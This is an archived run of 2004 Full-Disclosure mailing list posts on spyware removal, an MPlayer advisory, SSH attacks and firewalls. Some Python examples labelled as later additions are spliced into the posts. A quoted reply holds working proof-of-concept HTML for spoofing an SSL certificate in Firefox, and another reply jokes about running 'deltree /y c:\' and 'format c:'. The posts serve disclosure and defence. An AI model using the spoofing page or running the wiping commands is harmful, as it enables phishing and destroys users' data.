> that'll be worked around too eventually. (Rootkit-like spyware?)

complete with a remote shell, ftp server and ddos bot with irc capabilities along with spam bot capabilities ?

-aditya


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:41:05 CDT


> We are all computer people - fixing one computer is easy but could take 4
> hours - not very helpful on a mass scale. We pay for point and click, why
> shouldn't we get it? ;)

the sweet word over here is automation. Even if one computer takes 4 hours to clean, if you can find a way to do that and automate it, you have proved your worth to your employer, and that is what your employer is paying you for... if we don't get point and click, then we make it point and click and don't buy anything in this case

-aditya


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:49:56 CDT


> >Absolute and utter rot! I understand YOU may not be able to do
> it but it CAN
> >be done. It is simple logic if you want to look at it another
> way - whatever
> >can be DONE can be UNdone.
> >
>
> Did you really mean "whatever can be done can be UNdone"?
> How about a format C:? (I haven't seen "unformat" in a very long time.)
>

there are ways and means to do this with proper tools. I recently did this with my hdd and recovered 98% of all my data.....

now as we can all see this is heading into another flame war, can we stop this thread and post some relevant info (formatting has no relation to CWS whatsoever)

-aditya


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:21 CDT


> Try a deltree /y c:\ that usually does the trick.

and maybe format c:

and reboot to install freebsd / solaris / linux or whatever version of unix


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:17 CDT


> I did. Regardless of what it says, CWShredder doesn't get rid of all
> variants of CoolWebSearch.

this I found to be true in many cases, but could the original poster please post some more info about removing CWS ...

-aditya


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [ GLSA 200408-01 ] MPlayer: GUI filename handling overflow

From: Thierry Carrez (koongentoo.org)
Date: Sun Aug 01 2004 - 05:01:54 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200408-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MPlayer: GUI filename handling overflow
      Date: August 01, 2004
      Bugs: #55456
        ID: 200408-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

When compiled with GUI support, MPlayer is vulnerable to a remotely
exploitable buffer overflow attack.

Background
==========

MPlayer is a media player capable of handling multiple multimedia file
formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-video/mplayer < 1.0_pre4-r7 >= 1.0_pre4-r7

Description
===========

The MPlayer GUI code contains several buffer overflow vulnerabilities,
and at least one in the TranslateFilename() function is exploitable.

Impact
======

By enticing a user to play a file with a carefully crafted filename an
attacker could execute arbitrary code with the permissions of the user
running MPlayer.

Workaround
==========

To work around this issue, users can compile MPlayer without GUI
support by disabling the gtk USE flag. All users are encouraged to
upgrade to the latest available version of MPlayer.

Resolution
==========

All MPlayer users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=media-video/mplayer-1.0_pre4-r7"
    # emerge ">=media-video/mplayer-1.0_pre4-r7"

References
==========

  [ 1 ] Bugtraq Announcement
        http://www.securityfocus.com/bid/10615/
  [ 2 ] Open-Security Announcement
        http://www.open-security.org/advisories/5

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200408-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBDL+RvcL1obalX08RAvsoAKCa7xHOPPs+5E8kNoTvVcOYQIbCvwCeIDi6
SlzDBE5aEtx+3UvEFCh5CVo=
=n4Pk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Yaakov Yehudi (yehuditehila.gov.il)
Date: Sun Aug 01 2004 - 06:47:48 CDT


BHO Demon 2.0
http://www.definitivesolutions.com/bhodemon.htm

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 18:00
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis and AboutBuster.

Spybot and AdAware did not detect the BHO elements.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] 0xdefaced[6]

From: root (rootserver2.eurolab.at)
Date: Sat Jul 31 2004 - 22:11:28 CDT


hi, my name is Johny Knoxville and i wanna present 2 u
the new issue of the Russian underground zine 0xdefaced[6].

mirrors:
www.linux-party.at/defaced/defaced6e.zip
www.linux-party.at/defaced/defaced6r.zip
www.eurolab.at/defaced/defaced6e.zip
www.eurolab.at/defaced/defaced6r.zip
www.it-guru.at/defaced/defaced6e.zip
www.it-guru.at/defaced/defaced6r.zip
www.it-master.at/defaced/defaced6e.zip
www.it-master.at/defaced/defaced6r.zip
www.videopool.at/defaced/defaced6e.zip
www.videopool.at/defaced/defaced6r.zip
www.ihf-hr.org/defaced/defaced6e.zip
www.ihf-hr.org/defaced/defaced6r.zip
www.multisystem.at/defaced/defaced6e.zip
www.multisystem.at/defaced/defaced6r.zip
www.finker.at/defaced/defaced6e.zip
www.finker.at/defaced/defaced6r.zip

e - english version
r - russian

enjoy!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[sb] Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Juan Carlos Navea (loconetgmail.com)
Date: Sun Aug 01 2004 - 09:15:39 CDT


Has anyone tried the proof of concept with a real ssl cert and get it working?

I just tried it using two different ssl urls and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.

Can anyone confirm this? I haven't seen any mention of it on bugzilla either.

I'm using:

0.9.2 on Windows2k

On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <samuelbcgreen.com> wrote:
> Has this been posted to bugzilla????
>
> E.Kellinis wrote:
> > #########################################
> > Application: Mozilla Firefox
> > Vendors: http://www.mozilla.com
> > Version: 0.9.1 / 0.9.2
> > Platforms: Windows
> > Bug: Certificate Spoofing (Phishing)
> > Risk: High
> > Exploitation: Remote with browser
> > Date: 25 July 2004
> > Author: Emmanouel Kellinis
> > e-mail: mecipher(dot)org(dot)uk
> > web: http://www.cipher.org.uk
> > List : BugTraq(SecurityFocus)/ Full-Disclosure
> > #########################################
> >
> >
> > =======
> > Product
> > =======
> > A popular Web browser, good alternative to IE and
> > "The web browser" for linux machines,
> > used to view pages on the World Wide Web.
> >
> > ===
> > Bug
> > ===
> >
> > Firefox has a caching problem, as a result of which someone can
> > spoof a certificate of any website and use it as his/her own.
> > The problem is exploited using onunload inside < body> and
> > redirection using Http-equiv Refresh metatag, document.write()
> > and document.close()
> >
> > First you direct the redirection metatag to the website
> > of which you want to spoof the certificate, then inside
> > the < body> tag you add an onunload script so you can control
> > the output inside the webpage with the spoofed certificate.
> >
> > After that you say to firefox, as soon as you unload this page
> > close the stream, apparently the stream you close is
> > the redirection website, you do that with
> > document.close().
> >
> > Now you can write anything you want, you do that
> > using document.write(). After writing the content of your choice
> > you close the stream again, usually firefox won't display your content,
> > although if you check the source code you see it, so the last thing
> > is to refresh the new page (do that using window.location.reload()),
> > after that you have your domain name in the url field, your content
> > in the browser and the magic yellow Lock on the bottom left corner,
> > if you pass your mouse over it you will see displayed the name of
> > the website whose certificate you spoofed, if you double click on it you
> > will see full information of the certificate without any warning !
> >
> > You don't need to have SSL in your website ! it will work with
> > http.
> >
> > Additionally, using this bug malicious websites can bypass content
> > filtering using SSL properties.
> >
> >
> > =====================
> > Proof Of Concept Code
> > =====================
> >
> > <HTML>
> > <HEAD>
> > <TITLE>Spoofer</TITLE>
> > <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
> > </HEAD>
> > <BODY
> > onunload="
> > document.close();
> > document.writeln('<body onload=document.close();break;>
> > <h3>It is Great to Use example's Cert!');
> >
> > document.close();
> > window.location.reload();
> > ">
> > </body>
> >
> >
> > =========================================================
> > *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
> > =========================================================
>
> --
> Stephen Samuel +1(604)876-0426 samuelbcgreen.com
> http://www.bcgreen.com/~samuel/
> Powerful committed communication. Transformation touching
> the jewel within each person and bringing it to light.
>

--
http://scott.telnetd.com/loco/

--
 You have subscribed to the Sicherheitsbote.
 http://sicherheitsbote.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Automated SSH login attempts? Related Cross post from incidents.org

From: Jirka Kosina (jikosjikos.cz)
Date: Sun Aug 01 2004 - 10:49:04 CDT


On Fri, 30 Jul 2004, Harris, Michael C. wrote:

> We got zapped by some hackers from, I think, Romania that have a priv
> escalation exploit for Linux 2.4.20
> http://sirzion.illusivecreations.com/loginxy

This exploit really shouldn't be dangerous for any admin updating at least
once a year <g> - it is just a scriptkiddie exploit for old do_brk()
bounds check vulnerability.

--
JiKos.



 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Goetz Von Berlichingen (goetzvonberlichingencomcast.net)
Date: Sun Aug 01 2004 - 11:19:38 CDT


Ron DuFresne wrote:
..
> Google search: IPtables SPI ;;
>
> http://www.google.com/search?q=IPtables+SPI&sourceid=mozilla-search&start=0&start=0

   A better search would be
http://www.google.com/search?q=iptables+State+Packet+Inspection&sourceid=mozilla-search&start=0&start=0,

since yours hits on the patch for IPSEC that allows filtering on
Security Parameter Index (SPI).

   The original message has some merit with respect to netfilter - the
Linux kernel firewall is capable of looking at headers only. This does
allow some stateful packet inspection - one can discriminate against
incoming connection attempts with --syn, for instance. This isn't
really stateful, however, since the firewall does not retain any
knowledge of the state of a connection. iptables is pretty much useless
against covert channels such as Loki, Q, or any of the various tunneling
packages.

   The problem with stateful inspection is that it so easily leads to
self-denial of service. An attacker need only make enough legitimate
connections to overflow the firewall's capability. At that point, the
firewall either crashes or quits stateful inspection. Perhaps Mr. Gray
should consider how to add true stateful packet inspection to the
iptables software and contribute that patch back to the community?

Goetz



 
Re: [Full-Disclosure] Re:

From: Jan Muenther (jan.muenthernruns.com)
Date: Sun Aug 01 2004 - 11:12:11 CDT


Hi,

> This guy has been sending out viruses unknown to him his machine has been infected...

No, he hasn't. This is some worm forging mail senders, which is not the
slightest problem at all given how SMTP functions. In fact, most modern
self-spreading mail worms even come with their own SMTP engine and collect sender
addresses to spoof from different sources. 3APA3A is not an idiot and he
can't change the fact that some poor soul's b0rken PC (IP originates somewhere
in Cordoba, eh) is sending out worms forging his address. Neither can I or you.

You can try and reach the security contact for the ISP the IP is from. Good
luck with that.

> Received: from arsenio-casa.com ([200.55.20.89]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i6TN1vj05534 for <full-disclosurelists.netsys.com>; Thu, 29 Jul 2004 19:01:59 -0400 (EDT)

^^^^^^^^^^^^^^^
First sender.

Cheers, J.

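Jan's point, that the forged sender means nothing and the earliest Received: line is what shows who handed the mail to the list server, can be automated. The following is an added example (not the poster's code) that parses the Received: trace of a constructed message built around the quoted header line, then walks down from the newest hop only while the "by" host is one we trust, because hops below that boundary were written by the sending machine and can be forged. The relay names, the trusted set and the extra hops are assumptions.

```python
import re
from email import message_from_string

# Constructed sample: the middle Received line is the one quoted in the post
# (recipient rewritten); the top hop is a made-up local delivery, and the
# bottom hop is a made-up forged trace line stuffed in by the infected sender.
SAMPLE_MAIL = """\
Received: from netsys.com (netsys.com [198.51.100.7])
\tby mail.example.invalid (Postfix) with ESMTP id 4F2A1
\tfor <reader@example.invalid>; Thu, 29 Jul 2004 19:02:30 -0400 (EDT)
Received: from arsenio-casa.com ([200.55.20.89]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i6TN1vj05534 for <reader@example.invalid>; Thu, 29 Jul 2004 19:01:59 -0400 (EDT)
Received: from mail.innocent.example (mail.innocent.example [203.0.113.5])
\tby arsenio-casa.com with SMTP; Thu, 29 Jul 2004 18:59:00 -0400 (EDT)
From: forged-sender@example.invalid
Subject: worm sample

(body omitted)
"""

HOP_RE = re.compile(r"from\s+(?P<helo>\S+)\s+\((?P<info>[^)]*)\)\s+by\s+(?P<by>[\w.-]+)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_hops(raw_message):
    """Return the Received hops in header order (most recent first)."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.search(value)
        if not m:
            continue  # unparseable trace line: skip rather than guess
        ip = IP_RE.search(m.group("info"))
        hops.append({"helo": m.group("helo"),
                     "ip": ip.group(1) if ip else None,
                     "by": m.group("by")})
    return hops


def originating_relay(raw_message, trusted_relays):
    """Walk down from the newest hop while the 'by' host is one we trust; the
    last trusted hop records the IP that actually connected to our boundary.
    Anything below it was written by the sender and may be forged."""
    boundary = None
    for hop in parse_hops(raw_message):
        if hop["by"] not in trusted_relays:
            break
        boundary = hop
    return (boundary["ip"], boundary["helo"]) if boundary else None
```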


 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: evilninja (evilninjagmx.net)
Date: Sun Aug 01 2004 - 13:13:54 CDT


Peter Besenbruch wrote:
> This was fixed by the July 27 builds in both Firefox 0.9.2( or 1) and
> Mozilla 1.7. The Mozilla 1.4 branch was also updated.

I was not able to reproduce it in "Gecko/20040719 Firefox/0.9.1" either.
All I get is the real https:// site and this in the JS log:

Error: unterminated string literal
Source File:
Line: 1, Column: 17
Source Code:
document.writeln('<body onload=document.close();break;>

--
BOFH excuse #175:

OS swapped to disk



 
Re: [Full-Disclosure] 0xdefaced[6]

From: Collin (myuupojo.com)
Date: Sun Aug 01 2004 - 14:17:11 CDT


All are 404.

On Jul 31, 2004, at 10:11 PM, root wrote:

> hi, my name is Johny Knoxville and i wanna present 2 u
> new issue of the Russian underground zine 0xdefaced[6].
>
> mirrors:
> www.linux-party.at/defaced/defaced6e.zip
> www.linux-party.at/defaced/defaced6r.zip
> www.eurolab.at/defaced/defaced6e.zip
> www.eurolab.at/defaced/defaced6r.zip
> www.it-guru.at/defaced/defaced6e.zip
> www.it-guru.at/defaced/defaced6r.zip
> www.it-master.at/defaced/defaced6e.zip
> www.it-master.at/defaced/defaced6r.zip
> www.videopool.at/defaced/defaced6e.zip
> www.videopool.at/defaced/defaced6r.zip
> www.ihf-hr.org/defaced/defaced6e.zip
> www.ihf-hr.org/defaced/defaced6r.zip
> www.multisystem.at/defaced/defaced6e.zip
> www.multisystem.at/defaced/defaced6r.zip
> www.finker.at/defaced/defaced6e.zip
> www.finker.at/defaced/defaced6r.zip
>
> e - english version
> r - russian
>
> enjoy!
>



 
[Full-Disclosure] change the value of Cookies

From: Jarlin l'enchanteur (jarlinifrance.com)
Date: Sun Aug 01 2004 - 16:28:34 CDT


Hi List
I'm going to ask a stupid question for the security gurus :)
How can we change the values of a cookie ????????
I have used a proxy (SPIKE proxy) to do that but I haven't found an
elegant way to do this :(
thanks to all




 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Alain Crespo (gazpaeuskalnet.net)
Date: Sun Aug 01 2004 - 17:07:51 CDT


On Saturday 31 July 2004 17:59, Aviv Raff wrote:
> Confirmed. Using FireFox 0.9.2 on XP and Win2k3.

Also works on linux (Firefox 0.9.1)
--

Regards,

Alain Crespo <gazpaeuskalnet.net>


Why use Windows, since there is a door?



 
Re: [Full-Disclosure] change the value of Cookies

From: Jan Muenther (jan.muenthernruns.com)
Date: Sun Aug 01 2004 - 17:24:35 CDT


> I'm going to ask a stupid question for the security gurus :)
> How can we change the values of a cookie ????????
> I have used a proxy (SPIKE proxy) to do that but I haven't found an
> elegant way to do this :(

I use ELZA:

http://www.stoev.org/elza/



 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Aaron Gray (angraybeeb.net)
Date: Sun Aug 01 2004 - 13:14:43 CDT


> A better search would be
> http://www.google.com/search?q=iptables+State+Packet+Inspection&sourceid=mozilla-search&start=0&start=0,
>
> since yours hits on the patch for IPSEC that allows filtering on Security
> Parameter Index (SPI).
>
> The original message has some merit with respect to netfilter - the
> Linux kernel firewall is capable of looking at headers only. This does
> allow some stateful packet inspection - one can discriminate against
> incoming connection attempts with --syn, for instance. This isn't really
> stateful, however, since the firewall does not retain any knowledge of the
> state of a connection. iptables is pretty much useless agains covert
> channels such as Loki, Q, or any of the various tunneling packages.
>
> The problem with stateful inspection is that it so easily leads to
> self-denial of service. An attacker need only make enough legitimate
> connections to overflow the firewall's capability. At that point, the
> firewall either crashes or quits stateful inspection.

Or causes DoS'ing if storage were FILO rather than FIFO: chucking away the
oldest states first, then presumably you just get a general DoS'ing effect.
DoS'ing begets DoS'ing.

> Perhaps Mr. Gray should consider how to add true stateful packet
> inspection to the iptables software and contribute that patch back to the
> community?

Already done :-

        http://www.netfilter.org/

Not my contribution, I am more interested in creating a good free open
source SPI personal firewall for Windows.

Aaron

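Both posts in this thread turn on the same distinction: a header-only rule such as --syn keeps no memory of connections, while connection tracking keeps a table, and a table can fill. The following is an added toy model (my code, not netfilter's and not from either poster) that makes the two failure modes concrete: when the table is full, either new connections are refused or the oldest tracked one is thrown away and its next packet becomes invalid. The class and function names, the addresses and the table size are assumptions.

```python
from collections import OrderedDict

SYN, ACK, FIN, RST = 0x02, 0x10, 0x01, 0x04  # TCP flag bits


def pkt(src, sport, dst, dport, flags):
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "flags": flags}


class StatefulFilter:
    """Toy TCP connection tracker (a model, not netfilter code; no timeouts).
    Unlike a header-only '--syn' rule, a non-SYN packet with no table entry is
    INVALID. The table is bounded: when full, 'drop_new' refuses new connections
    (as netfilter does when its conntrack table fills), 'evict_oldest' drops the oldest."""

    def __init__(self, max_entries, policy="drop_new"):
        self.max_entries, self.policy = max_entries, policy
        self.table = OrderedDict()  # normalised 4-tuple -> state, oldest first

    def _key(self, p):
        a, b = (p["src"], p["sport"]), (p["dst"], p["dport"])
        return (a, b) if a <= b else (b, a)  # one key for both directions

    def classify(self, p):
        key = self._key(p)
        if key in self.table:
            self.table.move_to_end(key)  # refresh: recently seen is youngest
            return "ESTABLISHED"
        if p["flags"] & SYN and not p["flags"] & ACK:
            return "NEW"
        return "INVALID"  # e.g. a bare ACK that --syn alone would let through

    def accept(self, p):
        state = self.classify(p)
        if state != "NEW":
            return state == "ESTABLISHED"
        if len(self.table) >= self.max_entries:
            if self.policy == "drop_new":
                return False
            self.table.popitem(last=False)  # evict the oldest connection
        self.table[self._key(p)] = "SYN_SENT"
        return True


def flood_then_probe(policy, size=3):
    """Fill the table with legitimate handshakes, then probe a new client and the oldest one."""
    fw = StatefulFilter(size, policy)
    for i in range(size):
        fw.accept(pkt(f"198.51.100.{i}", 40000 + i, "10.0.0.1", 22, SYN))
    new_ok = fw.accept(pkt("203.0.113.9", 5555, "10.0.0.1", 22, SYN))
    old_ok = fw.accept(pkt("10.0.0.1", 22, "198.51.100.0", 40000, SYN | ACK))
    return new_ok, old_ok
```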


 
[Full-Disclosure] SSH login attempts: tcpdump packet capture

From: Jay Libove (libovefelines.org)
Date: Sun Aug 01 2004 - 13:03:39 CDT


I got a packet capture of one of the SSH2 sessions trying to log in as a
couple of illegal usernames. The contents of one packet suggests an
attempt to buffer overflow the SSH server; ethereal's SSH decoding says
"overly large value".

It didn't seem to work against my system (I see no strange processes
running; all files changed in past ten days look normal).

I am cross-posting this message and the attached tcpdump packet capture
file to the following places to let better people than I analyze it:
        openssh-unix-devmindrot.org
        secureshellsecurityfocus.com
        full-disclosurelists.netsys.com
        vulnwatchvulnwatch.org

-Jay Libove, CISSP




 
Re: [Full-Disclosure] 0xdefaced[6]

From: Phuong Nguyen (phuongecqurity.com)
Date: Sun Aug 01 2004 - 18:34:59 CDT


I was able to get the file any address earlier. Nice piece of work ;)
just like the *little phrack* hehe. I can't wait till phrack64.

Phuong

At 02:17 AM 8/2/2004, Collin wrote:
>All are 404.



 
[Full-Disclosure] Re:

From: Ekat (ekatliquidpages.com)
Date: Sun Aug 01 2004 - 21:21:39 CDT